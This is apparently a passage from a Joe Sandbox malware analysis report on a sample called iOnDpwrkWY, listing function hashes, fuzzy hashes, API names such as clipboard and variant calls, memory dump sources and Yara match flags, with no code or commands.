                                  • Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
                                  • Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
                                  • Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitVariant
                                  • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                  • API String ID: 1927566239-3011065302
                                  • Opcode ID: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                  • Instruction ID: b15ed75447d004059bd92cb0aab685e506027f8d6fbd9cff39a95e9f562a92ed
                                  • Opcode Fuzzy Hash: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
                                  • Instruction Fuzzy Hash: 5E41097000D7C19AD3659B28849878FBFE06BA7314F885A9DF6E84B3E2C7798449C753
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitVariant
                                  • String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
                                  • API String ID: 1927566239-3011065302
                                  • Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                  • Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
                                  • Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
                                  • Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Variant$ClearInit
                                  • String ID: A$e$e$n$p$p$v$w$z$z
                                  • API String ID: 2610073882-1114116150
                                  • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                  • Instruction ID: 3298a143648f1d312639ad539042dcc6a5dc6b4f64824fda058f64a064c19040
                                  • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                  • Instruction Fuzzy Hash: 3041373160C7C18ED331CB38885879BBFD2ABA6324F088AADD4E9872D6D7794505C763
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInit
                                  • String ID: A$e$e$n$p$p$v$w$z$z
                                  • API String ID: 2610073882-1114116150
                                  • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                  • Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
                                  • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                  • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                  • String ID:
                                  • API String ID: 1006321803-0
                                  • Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                  • Instruction ID: 66dd0c391679314c8e7e78926b4f1769baaf8736054fb916a84457109451a807
                                  • Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                  • Instruction Fuzzy Hash: 1751E2F1D08A929FD700AB7CD4493AEBFB0AB41310F048638D99997391D7799998C7A3
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: Wu
                                  • API String ID: 3664257935-4083010176
                                  • Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                  • Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
                                  • Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                  • Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E